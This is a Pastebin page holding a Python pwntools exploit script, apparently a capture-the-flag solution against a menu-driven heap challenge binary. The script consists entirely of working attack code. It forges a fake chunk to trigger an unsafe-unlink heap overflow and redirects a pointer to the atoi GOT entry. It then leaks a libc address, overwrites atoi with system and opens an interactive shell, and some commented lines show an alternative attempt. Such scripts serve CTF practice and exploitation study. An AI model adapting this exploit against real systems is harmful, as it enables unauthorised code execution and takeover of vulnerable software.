Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # -*- coding: utf-8 -*-
- #from pwnpwnpwn import *
- from pwn import *
- r = remote(host,port)
- def additem(length,name):
- r.recvuntil(":")
- r.sendline("2")
- r.recvuntil(":")
- r.sendline(str(length))
- r.recvuntil(":")
- r.sendline(name)
- def modify(idx,length,name):
- r.recvuntil(":")
- r.sendline("3")
- r.recvuntil(":")
- r.sendline(str(idx))
- r.recvuntil(":")
- r.sendline(str(length))
- r.recvuntil(":")
- r.sendline(name)
- def remove(idx):
- r.recvuntil(":")
- r.sendline("4")
- r.recvuntil(":")
- r.sendline(str(idx))
- def show():
- r.recvuntil(":")
- r.sendline("1")
- magic = 0x400d49 #disas magic
- additem(0x80,"a") #p
- additem(0x80,"b") #q
- additem(0x80,"c") #r
- fake_prev = 0
- fake_size = 0x81
- fd = 0x6020d8 - 0x18
- bk = 0x6020d8 - 0x10
- modify(0,0x300,"a"*0x90 + p64(fake_size) + p64(fake_prev) + p64(fd) + p64(bk) + "\x00"*0x60 + p64(fake_size - 1) + p64(0x90))
- remove(2)
- atoi_got = 0x0000000000602068
- modify(1, 0x80, p64(0xdeadbeef) + p64(atoi_got))
- show()
- r.recvuntil("0 : ")
- data = r.recvuntil("\n")[:-1][:6]
- atoi_addr = u64(data.ljust(8, "\x00"))
- libc = atoi_addr - 0x36e80
- system = libc + 0x45390
- modify(0,0x8,p64(system))
- r.recvuntil(":")
- r.sendline("sh")
- # additem(0x70,"ddaa")
- # modify(0,0x81,"a"*0x78 + p64(0xffffffffffffffff))
- # additem(-0xb0,"dada")
- # additem(0x20, "a"*8 + p64(magic))
- r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
